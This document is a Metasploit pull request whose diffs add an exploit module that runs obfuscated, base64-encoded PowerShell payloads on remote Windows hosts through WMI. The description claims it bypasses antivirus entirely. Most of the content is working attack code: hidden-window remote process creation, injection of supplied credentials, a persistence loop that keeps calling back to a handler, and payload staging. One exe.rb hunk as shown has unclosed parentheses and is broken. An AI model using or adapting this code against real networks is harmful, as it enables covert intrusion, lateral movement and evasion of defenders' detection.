### PR TITLE
Add WMI Execution of powershell payloads - AV bypass

### DIFF
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1080,15 +1080,15 @@ End Sub
 	end
 
 	def self.to_win32pe_psh_net(framework, code, opts={})
-		var_code = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_kernel32 = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_baseaddr = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_threadHandle = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_output = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_temp = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_codeProvider = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_compileParams = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_syscode = Rex::Text.rand_text_alpha(rand(8)+8)
+		var_code = Rex::Text.rand_text_alpha(rand(3)+3
+		var_kernel32 = Rex::Text.rand_text_alpha(rand(3)+3
+		var_baseaddr = Rex::Text.rand_text_alpha(rand(3)+3
+		var_threadHandle = Rex::Text.rand_text_alpha(rand(3)+3
+		var_output = Rex::Text.rand_text_alpha(rand(3)+3
+		var_temp = Rex::Text.rand_text_alpha(rand(3)+3
+		var_codeProvider = Rex::Text.rand_text_alpha(rand(3)+3
+		var_compileParams = Rex::Text.rand_text_alpha(rand(3)+3
+		var_syscode = Rex::Text.rand_text_alpha(rand(3)+3
 
 		code = code.unpack('C*')
 		psh = "Set-StrictMode -Version 2\r\n"
@@ -1130,12 +1130,12 @@ End Sub
 
 	def self.to_win32pe_psh(framework, code, opts={})
 
-		var_code = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_win32_func = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_payload = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_size = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_rwx = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_iter = Rex::Text.rand_text_alpha(rand(8)+8)
+		var_code = Rex::Text.rand_text_alpha(rand(3)+3
+		var_win32_func = Rex::Text.rand_text_alpha(rand(3)+3
+		var_payload = Rex::Text.rand_text_alpha(rand(3)+3
+		var_size = Rex::Text.rand_text_alpha(rand(3)+3
+		var_rwx = Rex::Text.rand_text_alpha(rand(3)+3
+		var_iter = Rex::Text.rand_text_alpha(rand(3)+3
 		code = code.unpack("C*")
 
 		# Add wrapper script

--- a/modules/exploits/windows/local/ps_wmi_exec.rb
+++ b/modules/exploits/windows/local/ps_wmi_exec.rb
@@ -10,16 +10,18 @@
 # http://metasploit.com/framework/
 ##
 
+##
+# Ideally the methods to create WMI wrapper functions and their callers
+# should be in /lib/msf/core/post/windows/powershell/ps_wmi.rb.
+##
 
 require 'msf/core'
- require 'msf/core/post/windows/services'
 require 'msf/core/post/windows/powershell'
 require 'msf/core/post/windows/powershell/dot_net'
 
 class Metasploit3 < Msf::Exploit::Local
 	Rank = ExcellentRanking
 
-	include Msf::Post::Windows::WindowsServices
 	include Msf::Post::Windows::Powershell
 	include Msf::Post::Windows::Powershell::DotNet
 
@@ -30,8 +32,9 @@ class Metasploit3 < Msf::Exploit::Local
 				This module uses WMI execution to launch a payload instance on a remote machine.
 				In order to avoid AV detection, all execution is performed in memory via psh-net
 				encoded payload. Persistence option can be set to keep the payload looping while
-				a handler is present to receive it. The user meterpreter is running under must
-				have administrative privileges on the remote host, token stealing does not work.
+				a handler is present to receive it. By default the module runs as the current
+				process owner. The module can be configured with credentials for the remote host
+				with which to launch the process.
 			},
 			'License'              => MSF_LICENSE,
 			'Author'               => 'RageLtMan <rageltman[at]sempervictus>',
@@ -45,6 +48,9 @@ class Metasploit3 < Msf::Exploit::Local
 		register_options(
 			[
 				OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
+				OptString.new('USERNAME', [false, "Username to authenticate as"]),
+				OptString.new('PASSWORD', [false, "Password to authenticate with"]),
+				OptString.new('DOMAIN', [false, "Domain or machine name"]),
 
 			], self.class)
 
@@ -74,7 +80,10 @@ class Metasploit3 < Msf::Exploit::Local
 			return 0
 		end
 		
-
+		run_opts = {}
+		run_opts[:username] = datastore['USERNAME']
+		run_opts[:domain] = datastore['DOMAIN'] || '.'
+		run_opts[:password] = datastore['PASSWORD']
 
 		# End of file marker
 		eof = Rex::Text.rand_text_alpha(8)
@@ -83,16 +92,42 @@ class Metasploit3 < Msf::Exploit::Local
 		# Create base64 encoded payload
 		payload = compress_script(payload_script, eof)
 		# WMI exec function - this is going into powershell.rb after pull 701 is commited
-		script = ps_wmi_exec
+		script = ps_wmi_exec(run_opts)
 		# Build WMI exec calls to every host into the script to reduce PS instances
 		# Need to address arch compat issue here, check powershell.exe arch, check pay arch
 		# split the hosts into wow64 and native, and run each range separately
 		ps_bin = datastore['RUN_WOW64'] ? 'cmd /c %windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
 		# for whatever reason, passing %systemroot% instead of 'C:\windows' fails
 
-		Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |host|
-			script << "\r\n New-RemoteProcess -rhost \"#{host}\" -cmd \"#{ps_bin} -EncodedCommand #{payload}\"\r\n"
+		if datastore["RHOSTS"]
+			# Iterate through our hosts list adding a call to the WMI wrapper for each.
+			# This should learn to differentiate between hosts and call WOW64 as appropriate,
+			# as well as putting the payload into a variable when many hosts are hit so the 
+			# uploaded script is not bloated since each encoded payload is bulky.
+
+			Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |host|
+				if run_opts[:username] and run_opts[:password]
+					script << "\r\n New-RemoteProcess -rhost \"#{host}\" -login \"#{run_opts[:domain]}\\#{run_opts[:username]}\""
+					script << " -pass \"#{run_opts[:password]}\" -cmd \"#{ps_bin} -EncodedCommand #{payload}\"\r\n"
+				else
+					script << "\r\n New-RemoteProcess -rhost \"#{host}\" -cmd \"#{ps_bin} -EncodedCommand #{payload}\"\r\n"
+				end
+			end
+		else
+			# Run locally - this seems to be broken at the moment, attempting to run
+			# via WMI from localhost results in 'Exception calling "CompileAssemblyFromSource" 
+			# with "2" argument(s): "The environment block used to start a process 
+			# cannot be longer than 65535 bytes.'
+
+			if run_opts[:username] and run_opts[:password]
+				script << "\r\n New-RemoteProcess -login \"#{run_opts[:domain]}\\#{run_opts[:username]}\""
+				script << " -pass \"#{run_opts[:password]}\" -cmd \"#{ps_bin} -EncodedCommand #{payload}\"\r\n"
+			else
+				script << "\r\n New-RemoteProcess -cmd \"#{ps_bin} -EncodedCommand #{payload}\"\r\n"
+			end
 		end
+
+		print_good script
 		# Compress
 		print_status('Compressing script contents:')
 		compressed_script = compress_script(script, eof)
@@ -114,10 +149,11 @@ class Metasploit3 < Msf::Exploit::Local
 		# Execute the powershell script
 		print_status('Executing the script.')
 		cmd_out, running_pids, open_channels = execute_script(script, true)
+		# Read output and clean up
 		get_ps_output(cmd_out,eof)
 		vprint_good( "Cleaning up #{running_pids.join(', ')}" )
 
-		#clean_up(nil, eof, running_pids, open_channels, env_suffix, false)
+		clean_up(nil, eof, running_pids, open_channels, env_suffix, false)
 
 		print_good('Finished!')
 	end
@@ -147,30 +183,43 @@ class Metasploit3 < Msf::Exploit::Local
 		return payload
 	end
 
-	def ps_wmi_exec
+	# Wrapper function for instantiating a WMI win32_process
+	# class object in powershell.
+	# Insantiates the [wmiclass] object and configure the scope
+	# Sets impersonation level and injects credentials as needed
+	# Configures application startup options to hide the newly
+	# created window. Adds start-up check for remote proc.
+	def ps_wmi_exec(opts = {})
+
 		ps_wrapper = <<EOS
 Function New-RemoteProcess {
-    Param([string]$rhost,[string]$cmd)
-    $ErrorActionPreference="SilentlyContinue"    
-    $startup=[wmiclass]"Win32_ProcessStartup"
-    $startup.Properties['ShowWindow'].value=$False
-    $remote = ([wmiclass]"\\\\$rhost\\root\\cimv2:win32_process").create($cmd,'C:\\',$startup)
-    if ($remote.returnvalue -eq 0) {
-        Write-Host "Successfully launched on $rhost with a process id of" $remote.processid
-    }
-    else {
-        Write-Host "Failed to launch on $rhost. ReturnValue is" $remote.ReturnValue
-    }
+    Param([string]$rhost,[string]$cmd,[string]$login,[string]$pass)
+    $ErrorActionPreference="SilentlyContinue"
+	$proc = [WMIClass]"\\\\$rhost\\root\\cimv2:Win32_Process"
+EOS
+	if opts[:username] and opts[:password]
+		ps_wrapper += <<EOS
+	$proc.psbase.Scope.Options.userName = $login
+	$proc.psbase.Scope.Options.Password = $pass
+EOS
+	end
+	ps_wrapper += <<EOS
+	$proc.psbase.Scope.Options.Impersonation = [System.Management.ImpersonationLevel]::Impersonate
+	$proc.psbase.Scope.Options.Authentication = [System.Management.AuthenticationLevel]::PacketPrivacy
+	$startup = [wmiclass]"Win32_ProcessStartup"
+	$startup.Properties['ShowWindow'].value=$False
+	$remote = $proc.Create($cmd,'C:\\',$startup)
+	if ($remote.returnvalue -eq 0) {
+		Write-Host "Successfully launched on $rhost with a process id of" $remote.processid
+	} else {
+		Write-Host "Failed to launch on $rhost. ReturnValue is" $remote.ReturnValue
+	}
 }
 
 EOS
+		
 
 	return ps_wrapper
 	end
 
 end
-# $wmi = [wmiclass]"\\127.0.0.1\root\cimv2:win32_process"
-# $wmi.computername = "127.0.0.1"
-#     [wmiclass]$wmi="\\\\$rhost\\root\\cimv2:win32_process"
-#     if (!$wmi) {return}
-#     $remote=$wmi.Create($cmd)

--- a/modules/exploits/windows/local/ps_wmi_exec.rb
+++ b/modules/exploits/windows/local/ps_wmi_exec.rb
@@ -1,0 +1,172 @@
+
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+ require 'msf/core/post/windows/services'
+require 'msf/core/post/windows/powershell'
+require 'msf/core/post/windows/powershell/dot_net'
+
+class Metasploit3 < Msf::Exploit::Local
+	Rank = ExcellentRanking
+
+	include Msf::Post::Windows::WindowsServices
+	include Msf::Post::Windows::Powershell
+	include Msf::Post::Windows::Powershell::DotNet
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'                 => "Current User WMI Exec Powershell",
+			'Description'          => %q{
+				This module uses WMI execution to launch a payload instance on a remote machine.
+				In order to avoid AV detection, all execution is performed in memory via psh-net
+				encoded payload. Persistence option can be set to keep the payload looping while
+				a handler is present to receive it. The user meterpreter is running under must
+				have administrative privileges on the remote host, token stealing does not work.
+			},
+			'License'              => MSF_LICENSE,
+			'Author'               => 'RageLtMan <rageltman[at]sempervictus>',
+			'Platform'      => [ 'windows' ],
+			'SessionTypes'  => [ 'meterpreter' ],
+			'Targets' => [ [ 'Universal', {} ] ],
+			'DefaultTarget' => 0,
+
+		))
+
+		register_options(
+			[
+				OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
+
+			], self.class)
+
+		register_advanced_options(
+			[
+				OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
+				OptBool.new('RUN_WOW64', [
+					false, 
+					'Execute powershell in 32bit compatibility mode, payloads need native arch',
+					false
+				]),
+
+			], self.class)
+
+	end
+
+	def exploit
+
+		# Make sure we meet the requirements before running the script
+		if !(session.type == "meterpreter" || have_powershell?)
+			print_error("Incompatible Environment")
+			return 0
+		end
+		# SYSTEM doesnt have credentials on remote hosts
+		if client.sys.config.getuid.upcase == 'NT AUTHORITY\SYSTEM'
+			print_error("Cannot run as system")
+			return 0
+		end
+		
+
+
+		# End of file marker
+		eof = Rex::Text.rand_text_alpha(8)
+		env_suffix = Rex::Text.rand_text_alpha(8)
+
+		# Create base64 encoded payload
+		payload = compress_script(payload_script, eof)
+		# WMI exec function - this is going into powershell.rb after pull 701 is commited
+		script = ps_wmi_exec
+		# Build WMI exec calls to every host into the script to reduce PS instances
+		# Need to address arch compat issue here, check powershell.exe arch, check pay arch
+		# split the hosts into wow64 and native, and run each range separately
+		ps_bin = datastore['RUN_WOW64'] ? 'C:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
+		# for whatever reason, passing %systemroot% instead of 'C:\windows' fails
+
+		Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |host|
+			script << "\r\n New-RemoteProcess -rhost \"#{host}\" -cmd \"#{ps_bin} -EncodedCommand #{payload}\"\r\n"
+		end
+
+		# Compress
+		print_status('Compressing script contents:')
+		compressed_script = compress_script(script, eof)
+
+		# If the compressed size is > 8100 bytes, launch stager
+		if (compressed_script.size > 8100)
+			print_error(" - Compressed size: #{compressed_script.size}")
+			error_msg =  "Compressed size may cause command to exceed "
+			error_msg += "cmd.exe's 8kB character limit."
+			print_error(error_msg)
+			print_status('Launching stager:')
+			script = stage_to_env(compressed_script, env_suffix)
+			print_good("Payload successfully staged.")
+		else
+			print_good(" - Compressed size: #{compressed_script.size}")
+			script = compressed_script
+		end
+
+		# Execute the powershell script
+		print_status('Executing the script.')
+		cmd_out, running_pids, open_channels = execute_script(script, true)
+		get_ps_output(cmd_out,eof)
+		vprint_good( "Cleaning up #{running_pids.join(', ')}" )
+
+		clean_up(nil, eof, running_pids, open_channels, env_suffix, false)
+
+		print_good('Finished!')
+	end
+
+
+	# This should be handled by the exploit mixin, right?
+	def payload_script
+		pay_mod = framework.payloads.create(datastore['PAYLOAD'])
+		payload = pay_mod.generate_simple(
+			"BadChars"    => '',
+			"Format"      => 'psh-net',
+			"Encoder"     => 'x86/shikata_ga_nai',
+			"ForceEncode" => true,
+			"Options" => 
+			 {
+				'LHOST' => datastore['LHOST'],
+				'LPORT' => datastore['LPORT'],
+				'EXITFUNC' => 'thread'
+			},
+		)
+		if datastore['PERSIST']
+			fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
+			sleep_time = rand(5)+5
+			payload  = "function #{fun_name}{#{payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name}}"
+		end
+
+		return payload
+	end
+
+	def ps_wmi_exec
+		ps_wrapper = <<EOS
+Function New-RemoteProcess {
+    Param([string]$rhost,[string]$cmd)
+    $ErrorActionPreference="SilentlyContinue"    
+    [wmiclass]$wmi="\\\\$rhost\\root\\cimv2:win32_process"
+    if (!$wmi) {return}
+    $remote=$wmi.Create($cmd)
+    if ($remote.returnvalue -eq 0) {
+        Write-Host "Successfully launched on $rhost with a process id of" $remote.processid
+    }
+    else {
+        Write-Host "Failed to launch on $rhost. ReturnValue is" $remote.ReturnValue
+    }
+}
+
+EOS
+
+	return ps_wrapper
+	end
+
+end

--- a/modules/exploits/windows/local/ps_wmi_exec.rb
+++ b/modules/exploits/windows/local/ps_wmi_exec.rb
@@ -127,7 +127,6 @@ class Metasploit3 < Msf::Exploit::Local
 			end
 		end
 
-		print_good script
 		# Compress
 		print_status('Compressing script contents:')
 		compressed_script = compress_script(script, eof)

--- a/modules/exploits/windows/local/ps_wmi_exec.rb
+++ b/modules/exploits/windows/local/ps_wmi_exec.rb
@@ -38,6 +38,10 @@ class Metasploit3 < Msf::Exploit::Local
 			},
 			'License'              => MSF_LICENSE,
 			'Author'               => 'RageLtMan <rageltman[at]sempervictus>',
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread',
+				},
 			'Platform'      => [ 'windows' ],
 			'SessionTypes'  => [ 'meterpreter' ],
 			'Targets' => [ [ 'Universal', {} ] ],
@@ -70,12 +74,13 @@ class Metasploit3 < Msf::Exploit::Local
 	def exploit
 
 		# Make sure we meet the requirements before running the script
+		# Shell sessions can't kill PIDs 
 		if !(session.type == "meterpreter" || have_powershell?)
 			print_error("Incompatible Environment")
-			return 0
+			return
 		end
 		# SYSTEM doesnt have credentials on remote hosts
-		if client.sys.config.getuid.upcase == 'NT AUTHORITY\SYSTEM'
+		if client.sys.config.getuid =~ /system$/i
 			print_error("Cannot run as system")
 			return 0
 		end
@@ -90,7 +95,8 @@ class Metasploit3 < Msf::Exploit::Local
 		env_suffix = Rex::Text.rand_text_alpha(8)
 
 		# Create base64 encoded payload
-		payload = compress_script(payload_script, eof)
+		psh_payload= Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
+		psh_payload = compress_script(psh_payload, eof)
 		# WMI exec function - this is going into powershell.rb after pull 701 is commited
 		script = ps_wmi_exec(run_opts)
 		# Build WMI exec calls to every host into the script to reduce PS instances
@@ -108,9 +114,9 @@ class Metasploit3 < Msf::Exploit::Local
 			Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |host|
 				if run_opts[:username] and run_opts[:password]
 					script << "\r\n New-RemoteProcess -rhost \"#{host}\" -login \"#{run_opts[:domain]}\\#{run_opts[:username]}\""
-					script << " -pass \"#{run_opts[:password]}\" -cmd \"#{ps_bin} -EncodedCommand #{payload}\"\r\n"
+					script << " -pass \"#{run_opts[:password]}\" -cmd \"#{ps_bin} -EncodedCommand #{psh_payload}\"\r\n"
 				else
-					script << "\r\n New-RemoteProcess -rhost \"#{host}\" -cmd \"#{ps_bin} -EncodedCommand #{payload}\"\r\n"
+					script << "\r\n New-RemoteProcess -rhost \"#{host}\" -cmd \"#{ps_bin} -EncodedCommand #{psh_payload}\"\r\n"
 				end
 			end
 		else
@@ -121,9 +127,9 @@ class Metasploit3 < Msf::Exploit::Local
 
 			if run_opts[:username] and run_opts[:password]
 				script << "\r\n New-RemoteProcess -login \"#{run_opts[:domain]}\\#{run_opts[:username]}\""
-				script << " -pass \"#{run_opts[:password]}\" -cmd \"#{ps_bin} -EncodedCommand #{payload}\"\r\n"
+				script << " -pass \"#{run_opts[:password]}\" -cmd \"#{ps_bin} -EncodedCommand #{psh_payload}\"\r\n"
 			else
-				script << "\r\n New-RemoteProcess -cmd \"#{ps_bin} -EncodedCommand #{payload}\"\r\n"
+				script << "\r\n New-RemoteProcess -cmd \"#{ps_bin} -EncodedCommand #{psh_payload}\"\r\n"
 			end
 		end
 
@@ -157,34 +163,9 @@ class Metasploit3 < Msf::Exploit::Local
 		print_good('Finished!')
 	end
 
-
-	# This should be handled by the exploit mixin, right?
-	def payload_script
-		pay_mod = framework.payloads.create(datastore['PAYLOAD'])
-		payload = pay_mod.generate_simple(
-			"BadChars"    => '',
-			"Format"      => 'psh-net',
-			"Encoder"     => 'x86/shikata_ga_nai',
-			"ForceEncode" => true,
-			"Options" => 
-			 {
-				'LHOST' => datastore['LHOST'],
-				'LPORT' => datastore['LPORT'],
-				'EXITFUNC' => 'thread'
-			},
-		)
-		if datastore['PERSIST']
-			fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
-			sleep_time = rand(5)+5
-			payload  = "function #{fun_name}{#{payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name};1}"
-		end
-
-		return payload
-	end
-
 	# Wrapper function for instantiating a WMI win32_process
 	# class object in powershell.
-	# Insantiates the [wmiclass] object and configure the scope
+	# Insantiates the [wmiclass] object and configures the scope
 	# Sets impersonation level and injects credentials as needed
 	# Configures application startup options to hide the newly
 	# created window. Adds start-up check for remote proc.

--- a/modules/exploits/windows/local/ps_wmi_exec.rb
+++ b/modules/exploits/windows/local/ps_wmi_exec.rb
@@ -87,13 +87,12 @@ class Metasploit3 < Msf::Exploit::Local
 		# Build WMI exec calls to every host into the script to reduce PS instances
 		# Need to address arch compat issue here, check powershell.exe arch, check pay arch
 		# split the hosts into wow64 and native, and run each range separately
-		ps_bin = datastore['RUN_WOW64'] ? 'C:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
+		ps_bin = datastore['RUN_WOW64'] ? 'cmd /c %windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
 		# for whatever reason, passing %systemroot% instead of 'C:\windows' fails
 
 		Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |host|
 			script << "\r\n New-RemoteProcess -rhost \"#{host}\" -cmd \"#{ps_bin} -EncodedCommand #{payload}\"\r\n"
 		end
-
 		# Compress
 		print_status('Compressing script contents:')
 		compressed_script = compress_script(script, eof)
@@ -118,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Local
 		get_ps_output(cmd_out,eof)
 		vprint_good( "Cleaning up #{running_pids.join(', ')}" )
 
-		clean_up(nil, eof, running_pids, open_channels, env_suffix, false)
+		#clean_up(nil, eof, running_pids, open_channels, env_suffix, false)
 
 		print_good('Finished!')
 	end
@@ -142,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Local
 		if datastore['PERSIST']
 			fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
 			sleep_time = rand(5)+5
-			payload  = "function #{fun_name}{#{payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name}}"
+			payload  = "function #{fun_name}{#{payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name};1}"
 		end
 
 		return payload
@@ -153,9 +152,9 @@ class Metasploit3 < Msf::Exploit::Local
 Function New-RemoteProcess {
     Param([string]$rhost,[string]$cmd)
     $ErrorActionPreference="SilentlyContinue"    
-    [wmiclass]$wmi="\\\\$rhost\\root\\cimv2:win32_process"
-    if (!$wmi) {return}
-    $remote=$wmi.Create($cmd)
+    $startup=[wmiclass]"Win32_ProcessStartup"
+    $startup.Properties['ShowWindow'].value=$False
+    $remote = ([wmiclass]"\\\\$rhost\\root\\cimv2:win32_process").create($cmd,'C:\\',$startup)
     if ($remote.returnvalue -eq 0) {
         Write-Host "Successfully launched on $rhost with a process id of" $remote.processid
     }
@@ -170,3 +169,8 @@ EOS
 	end
 
 end
+# $wmi = [wmiclass]"\\127.0.0.1\root\cimv2:win32_process"
+# $wmi.computername = "127.0.0.1"
+#     [wmiclass]$wmi="\\\\$rhost\\root\\cimv2:win32_process"
+#     if (!$wmi) {return}
+#     $remote=$wmi.Create($cmd)


### PR DESCRIPTION
Remote payload execution without disk access via WMI and powershell.
This module uses the current user's credentials (must be an admin
on the remote machine) to execute a WMI call to the remote host.
The WMI call starts powershell.exe and passes a psh-net payload
encoded in base64 as an argument. The payload can be wrapped in a
loop which runs so long as a handler can catch the payload. The
loop break on failure to connect is still under investigation.

This method of execution entirely bypasses AV as there's no binary
to check, no powershell script to read from disk, and nothing short
of a command argument to evaluate at all. The payload is obfuscated
every time it is generated and then base64 encoded so there's no
signature on the wire either.

Now, who wants to build COM/DCOM/WMI for ruby natively without win32ole bindings? This can replace PSExec entirely without much concern for AV detection.
